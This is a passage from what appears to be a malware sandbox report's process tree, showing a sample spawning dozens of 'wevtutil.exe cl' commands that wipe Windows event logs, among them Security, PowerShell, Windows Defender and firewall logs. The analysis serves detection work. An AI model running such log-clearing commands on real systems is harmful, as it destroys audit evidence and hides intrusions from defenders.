- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
    3⤵
    PID:1876
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"
    3⤵
    PID:1976
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"
    3⤵
    - Clears Windows event logs
    PID:1560
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"
    3⤵
    PID:1812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"
    3⤵
    PID:1712
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"
    3⤵
    PID:1048
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"
    3⤵
    PID:824
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Debug"
    3⤵
    PID:1220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"
    3⤵
    PID:452
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"
    3⤵
    PID:1540
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"
    3⤵
    PID:860
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RPC/Debug"
    3⤵
    PID:1192
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"
    3⤵
    PID:1624
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"
    3⤵
    - Clears Windows event logs
    PID:576
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"
    3⤵
    PID:1760
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"
    3⤵
    - Clears Windows event logs
    PID:364
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"
    3⤵
    PID:1008
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Recovery/Operational"
    3⤵
    PID:1772
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"
    3⤵
    - Clears Windows event logs
    PID:1188
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
    3⤵
    PID:1804
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"
    3⤵
    PID:268
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"
    3⤵
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"
    3⤵
    PID:1952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
    3⤵
    PID:232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
    3⤵
    PID:216
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"
    3⤵
    PID:236
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
    3⤵
    PID:616
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
    3⤵
    PID:592
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"
    3⤵
    PID:1564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"
    3⤵
    PID:1896
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"
    3⤵
    PID:1784
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1480
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
    3⤵
    PID:1580
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
    3⤵
    PID:1100
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
    3⤵
    PID:1248
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"
    3⤵
    PID:1408
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sens/Debug"
    3⤵
    PID:1656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"
    3⤵
    PID:740
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"
    3⤵
    PID:1872
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"
    3⤵
    PID:1292
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"
    3⤵
    PID:1612
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"
    3⤵
    PID:668
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"
    3⤵
    PID:1296
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"
    3⤵
    PID:1220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
    3⤵
    PID:452
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1540
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
    3⤵
    PID:860
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
    3⤵
    PID:1192
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
    3⤵
    PID:1624
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"
    3⤵
    PID:576
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
    3⤵
    PID:1552
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"
    3⤵
    PID:756
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
    3⤵
    PID:1752
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"
    3⤵
    PID:1080
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
    3⤵
    PID:360
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"
    3⤵
    PID:1476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sidebar/Diagnostic"
    3⤵
    PID:1908
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"
    3⤵
    - Clears Windows event logs
    PID:968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"
    3⤵
    PID:892
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StickyNotes/Admin"
    3⤵
    - Clears Windows event logs
    PID:1456
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StickyNotes/Debug"
    3⤵
    PID:1980
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StickyNotes/Diagnostic"
    3⤵
    PID:220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"
    3⤵
    PID:2004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StorPort/Operational"
    3⤵
    PID:212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"
    3⤵
    PID:1272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"
    3⤵
    PID:272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Superfetch/Main"
    3⤵
    PID:1884
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"
    3⤵
    PID:2044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"
    3⤵
    PID:840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SystemHealthAgent/Diagnostic"
    3⤵
    PID:1448
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"
    3⤵
    PID:1684
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"
    3⤵
    - Clears Windows event logs
    PID:1228
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1876
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"
    3⤵
    PID:1976
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"
    3⤵
    PID:1560
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"
    3⤵
    PID:280
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"
    3⤵
    PID:1712
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"
    3⤵
    PID:1048
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"
    3⤵
    - Clears Windows event logs
    PID:824
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"
    3⤵
    PID:460
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"
    3⤵
    PID:1916
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"
    3⤵
    PID:1868
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"
    3⤵
    PID:812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"
    3⤵
    PID:1880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"
    3⤵
    - Clears Windows event logs
    PID:760
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"
    3⤵
    PID:1900
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"
    3⤵
    PID:1760
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
    3⤵
    - Clears Windows event logs
    PID:364
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"
    3⤵
    PID:1008
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"
    3⤵
    PID:1772
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"
    3⤵
    PID:1188
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"
    3⤵
    PID:208
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"
    3⤵
    PID:268
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"
    3⤵
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Debug"
    3⤵
    PID:1952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"
    3⤵
    PID:232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"
    3⤵
    PID:216
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"
    3⤵
    - Clears Windows event logs
    PID:224
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"
    3⤵
    PID:616
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"
    3⤵
    PID:592
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"
    3⤵
    - Clears Windows event logs
    PID:1564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"
    3⤵
    PID:844
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin"
    3⤵
    PID:1784
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Analytic"
    3⤵
    PID:1480
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Debug"
    3⤵
    PID:1580
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational"
    3⤵
    PID:1100
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ThemeCPL/Diagnostic"
    3⤵
    PID:1248
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ThemeUI/Diagnostic"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TunnelDriver"
    3⤵
    PID:1408
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UAC-FileVirtualization/Operational"
    3⤵
    PID:1656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UAC/Operational"
    3⤵
    PID:740
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UIAnimation/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Debug"
    3⤵
    - Clears Windows event logs
    PID:1292
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Diagnostic"
    3⤵
    PID:1612
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Perf"
    3⤵
    PID:668
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UIRibbon/Diagnostic"
    3⤵
    PID:1296
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-USB-USBHUB/Diagnostic"
    3⤵
    PID:460
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-USB-USBPORT/Diagnostic"
    3⤵
    PID:1916
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-User Control Panel Performance/Diagnostic"
    3⤵
    PID:1868
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-User Profile Service/Diagnostic"
    3⤵
    PID:812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-User Profile Service/Operational"
    3⤵
    PID:1880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-User-Loader/Analytic"
    3⤵
    PID:760
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserModePowerService/Diagnostic"
    3⤵
    PID:576
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"
    3⤵
    PID:1552
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceNotifications"
    3⤵
    PID:756
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserPnp/Performance"
    3⤵
    PID:1108
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserPnp/SchedulerOperations"
    3⤵
    PID:1080
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UxTheme/Diagnostic"
    3⤵
    PID:360
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VAN/Diagnostic"
    3⤵
    PID:1476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VDRVROOT/Operational"
    3⤵
    PID:1908
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VHDMP/Operational"
    3⤵
    PID:428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VWiFi/Diagnostic"
    3⤵
    PID:968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VolumeControl/Performance"
    3⤵
    PID:892
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VolumeSnapshot-Driver/Operational"
    3⤵
    PID:1456
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WABSyncProvider/Analytic"
    3⤵
    PID:1980
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"
    3⤵
    PID:220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WER-Diag/Operational"
    3⤵
    PID:2004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WFP/Analytic"
    3⤵
    PID:212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WFP/Operational"
    3⤵
    PID:1272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WLAN-AutoConfig/Operational"
    3⤵
    PID:272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"
    3⤵
    PID:1884
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WLANConnectionFlow/Diagnostic"
    3⤵
    PID:2044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Trace"
    3⤵
    PID:840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPDMCCore/Diagnostic"
    3⤵
    PID:1448
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPDMCUI/Diagnostic"
    3⤵
    PID:1684
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"
    3⤵
    PID:1228
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPNSS-Service/Diagnostic"
    3⤵
    PID:1876
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPNSSUI/Diagnostic"
    3⤵
    PID:1976
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Analytic"
    3⤵
    PID:1560
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Operational"
    3⤵
    PID:280
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Analytic"
    3⤵
    PID:1712
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Operational"
    3⤵
    PID:1048
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-MTPClassDriver/Operational"
    3⤵
    PID:476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WSC-SRV/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1496
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WUSA/Debug"
    3⤵
    PID:516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WWAN-MM-Events/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1596
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic"
    3⤵
    PID:1768
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WWAN-SVC-Events/Diagnostic"
    3⤵
    PID:1624
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WWAN-UI-Events/Diagnostic"
    3⤵
    PID:1168
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WebIO-NDF/Diagnostic"
    3⤵
    PID:1900
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WebIO/Diagnostic"
    3⤵
    PID:1760
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WebServices/Tracing"
    3⤵
    PID:364
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/Concurrency"
    3⤵
    PID:1008
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/Power"
    3⤵
    PID:1772
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/Render"
    3⤵
    PID:1188
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/Tracing"
    3⤵
    PID:208
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/UIPI"
    3⤵
    PID:268
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinHTTP-NDF/Diagnostic"
    3⤵
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinHttp/Diagnostic"
    3⤵
    PID:1952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinINet/Analytic"
    3⤵
    PID:232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinRM/Analytic"
    3⤵
    PID:216
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinRM/Debug"
    3⤵
    PID:224
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinRM/Operational"
    3⤵
    PID:616
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windeploy/Analytic"
    3⤵
    PID:592
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Defender/Operational"
    3⤵
    PID:1564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Defender/WHC"
    3⤵
    PID:844
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"
    3⤵
    PID:1784
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurityVerbose"
    3⤵
    PID:1704
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"
    3⤵
    - Clears Windows event logs
    PID:1580
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallVerbose"
    3⤵
    PID:1100
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsBackup/ActionCenter"
    3⤵
    PID:1248
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Debug"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Operational"
    3⤵
    PID:1408
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Operational"
    3⤵
    PID:1656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Tracing"
    3⤵
    PID:740
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsUpdateClient/Operational"
    3⤵
    PID:2024
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wininit/Diagnostic"
    3⤵
    PID:1292
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Winlogon/Diagnostic"
    3⤵
    PID:1612
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Winlogon/Operational"
    3⤵
    PID:668
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Winsock-AFD/Operational"
    3⤵
    PID:1296
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Winsock-WS2HELP/Operational"
    3⤵
    PID:1496
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Winsrv/Analytic"
    3⤵
    PID:516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Diagnostic"
    3⤵
    PID:1596
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Operational"
    3⤵
    - Clears Windows event logs
    PID:1768
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wordpad/Admin"
    3⤵
    PID:1880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wordpad/Debug"
    3⤵
    PID:852
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wordpad/Diagnostic"
    3⤵
    PID:1720
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-mobsync/Diagnostic"
    3⤵
    PID:1552
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ntshrui"
    3⤵
    PID:756
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-osk/Diagnostic"
    3⤵
    PID:1108
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-stobject/Diagnostic"
    3⤵
    PID:1080
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "OAlerts"
    3⤵
    PID:204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Security"
    3⤵
    PID:1476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Setup"
    3⤵
    PID:1908
